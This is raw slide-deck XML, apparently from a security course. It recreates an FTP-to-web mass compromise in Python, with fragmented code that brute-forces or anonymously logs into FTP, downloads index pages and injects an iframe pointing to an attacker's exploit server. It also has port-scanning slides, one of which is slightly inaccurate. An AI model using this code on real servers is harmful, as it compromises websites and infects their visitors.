            <a:off x="230196" y="9987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Adding a Malicious Inject to Web Pages</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200"/>
            </a:br>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="622" name="Google Shape;622;g1e9a65c21fa_31_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680326" y="2336875"/>
            <a:ext cx="11366100" cy="35994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sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The page at "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://10.10.10.112:8080/exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>" will exploit the redirected victims, which will provide a call back to the attacker's command and control server. A command-and-control server is a server used by an attacker to control and communicate with compromised systems. The attacker can use this server to steal sensitive information, spread malware, and perform other malicious activities.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>It's important to note that this kind of attack is very dangerous and can have severe security implications. Therefore, it's important to keep your software and systems up to date, use a browser and software that are not vulnerable to the exploit, use a firewall, and monitor logs for any suspicious activities. Additionally, it is important to ensure that your web pages are served over a secure connection (HTTPS) to prevent malicious redirects or Man-in-the-Middle attacks.</a:t>
            </a:r>
            <a:endParaRPr>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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="164746"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FTP_INJECT CODE</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="628" name="Google Shape;628;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="315200" y="2181500"/>
            <a:ext cx="11396400" cy="4558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ftplib</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inject_page</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redirect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with</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'.tmp'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'w'</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retrlines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'RETR '</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Downloaded Page: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redirect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Injected Malicious IFrame on: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storlines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'STOR '</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'.tmp'</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Uploaded Injected Page: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e9adf94182_2_28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="33796" y="83507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latin typeface="Russo One"/>
                <a:ea typeface="Russo One"/>
                <a:cs typeface="Russo One"/>
                <a:sym typeface="Russo One"/>
              </a:rPr>
              <a:t>BUILDING A PORT SCANNER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>CONTD..</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Russo One"/>
              <a:ea typeface="Russo One"/>
              <a:cs typeface="Russo One"/>
              <a:sym typeface="Russo One"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="Google Shape;237;g1e9adf94182_2_28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="33796" y="2524739"/>
            <a:ext cx="11472600" cy="4333261"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This passage is describing two different types of port scanning techniques. The first one is called a TCP SYN packet scan. This method involves sending a special packet called a TCP SYN packet to a series of common ports on a target system. </a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The target system then responds with a TCP ACK packet if the port is open. This response is used to signal that the port is open and can be accessed.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The second method is called a TCP Connect Scan. It uses the full three-way handshake, which is a standard process used to establish a connection between two systems over a network, in order to determine if a service or port is available. </a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This method is slower than the TCP SYN packet scan, but it is more accurate.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Google Shape;238;g1e9adf94182_2_28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="509048" y="2027859"/>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g1fe188b01e2_0_71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="164746"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FTP_INJECT CODE</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="634" name="Google Shape;634;g1fe188b01e2_0_71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="315200" y="2181500"/>
            <a:ext cx="11396400" cy="4558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62857"/>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__name__</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"__main__"</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62857"/>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'192.168.95.179'</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62857"/>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'guest'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62857"/>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'guest'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62857"/>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conn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ftplib</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62857"/>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conn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login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62857"/>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redirect_html</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'&lt;iframe src="http:</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10.10.10.112:8080</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exploit"&gt;'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'&lt;/iframe&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>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inject_page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conn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'index.html'</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redirect_html</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)</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2073b6da4c1_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="229150" y="753225"/>
            <a:ext cx="100650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MASS COMPROMISE BY BRIDGING FTP AND WEB</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="640" name="Google Shape;640;g2073b6da4c1_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680325" y="2336875"/>
            <a:ext cx="10065000" cy="4385100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-203200" lvl="0" marL="228600" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In a recent massive compromise, dubbed k985ytv, attackers used anonymous and stolen FTP credentials to gain access to 22,400 unique domains and 536,000 infected pages (Huang, 2011). With access granted, the attackers injected JavaScript to redirect benign pages to a malicious domain in the Ukraine. </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-203200" lvl="0" marL="228600" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Once the infected server redirected the victims, the malicious Ukrainian host exploited victims in order to install a fake antivirus program that stole credit card information from the clients. The k985yty attack proved to be a resounding success. In the following section, we will recreate this attack in Python. </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-203200" lvl="0" marL="228600" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Examining the FTP logs of the servers, we can see exactly what happened. An automated script connected to the target host in order to deter mine if it contained a default page named index.htm. Next the attacker uploaded a new index.htm, presumably containing the malicious redirection script. The infected server then exploited any vulnerable clients that visited its pages</a:t>
            </a:r>
            <a:endParaRPr sz="2000">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2073b6da4c1_0_5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="229150" y="753225"/>
            <a:ext cx="100650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MASS COMPROMISE BY BRIDGING FTP AND WEB</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="646" name="Google Shape;646;g2073b6da4c1_0_5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="229150" y="2831780"/>
            <a:ext cx="11507100" cy="40263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sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This statement describes a specific type of cyber attack, known as the "k985ytv" compromise, in which attackers used anonymous and stolen FTP credentials to gain access to 22,400 unique domains and 536,000 infected pages. This attack is an example of a website compromise, in which attackers gain access to a website, and then use it to infect visitors to the website.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The attackers in the k985ytv compromise used FTP credentials to connect to the target host and determine if it contained a default page named "index.htm." If the page was found, the attacker then uploaded a new "index.htm," which presumably contained a malicious redirection script. This script would redirect visitors to a malicious domain in the Ukraine, where the malicious host would exploit any vulnerable clients that visited its pages. Once infected, the victims were then installed a fake antivirus program that stole credit card information from the clients.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="647" name="Google Shape;647;g2073b6da4c1_0_5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="670894" y="2170497"/>
            <a:ext cx="5013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g2073b6da4c1_0_11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="229150" y="753225"/>
            <a:ext cx="100650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MASS COMPROMISE BY BRIDGING FTP AND WEB</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="653" name="Google Shape;653;g2073b6da4c1_0_11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680321" y="2336873"/>
            <a:ext cx="10754400" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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The statement also mentions that the k985ytv attack proved to be a resounding success, and the following section will recreate the attack in python. This is a serious security concern and highlights the importance of securing and monitoring FTP access, as well as keeping your software and systems up to date to prevent known vulnerabilities. </a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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It's important to note that this type of attack is not limited to just FTP, but can be done via other protocols like HTTP, SSH, etc. It is also important to use strong and unique credentials and avoid using default credentials, as well as monitoring logs to detect malicious activities.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">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2073b6da4c1_0_16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245525" y="753225"/>
            <a:ext cx="100485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FTP mass compromise by bridging FTP and WEB Code</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="659" name="Google Shape;659;g2073b6da4c1_0_16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406375" y="2181500"/>
            <a:ext cx="11416500" cy="4548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ftplib</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argparse</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time</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anon_login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hostname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ftplib</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hostname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try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login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'anonymous'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'me@your.com'</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hostname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FTP Anonymous Logon Succeeded.'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True</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="D19A66"/>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Exception</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hostname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FTP Anonymous Logon Failed.'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Exception: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False</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g2073b6da4c1_0_21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245525" y="753225"/>
            <a:ext cx="100485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FTP mass compromise by bridging FTP and WEB Code</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="665" name="Google Shape;665;g2073b6da4c1_0_21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406375" y="2181500"/>
            <a:ext cx="11416500" cy="4548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finally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quit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brute_login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hostname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passwd_file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with</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passwd_file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ftplib</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hostname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readlines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time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sleep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split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0</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line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split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\r</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Trying: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2073b6da4c1_0_26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245525" y="753225"/>
            <a:ext cx="100485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FTP mass compromise by bridging FTP and WEB Code</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="671" name="Google Shape;671;g2073b6da4c1_0_26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406375" y="2181500"/>
            <a:ext cx="11416500" cy="4548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try</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login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hostname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FTP Logon Succeeded: '</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quit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password</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="E06C75"/>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except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Exception</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Exception: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pass</a:t>
            </a:r>
            <a:endParaRPr b="0" i="1" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="C678DD"/>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t/>
            </a:r>
            <a:endParaRPr b="0" i="1" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="C678DD"/>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 Could not brute force FTP credentials.'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None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None</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="D19A66"/>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2073b6da4c1_0_31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245525" y="753225"/>
            <a:ext cx="100485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FTP mass compromise by bridging FTP and WEB Code</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="677" name="Google Shape;677;g2073b6da4c1_0_31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406375" y="2181500"/>
            <a:ext cx="11416500" cy="4548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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>def</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return_default</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ftp</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try</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dir_list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E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ftp</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61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>nlst</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except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5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Exception</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as</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e</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print</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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'[-] Could not list directory contents.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>\n</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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'[-] Skipping To Next Target.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
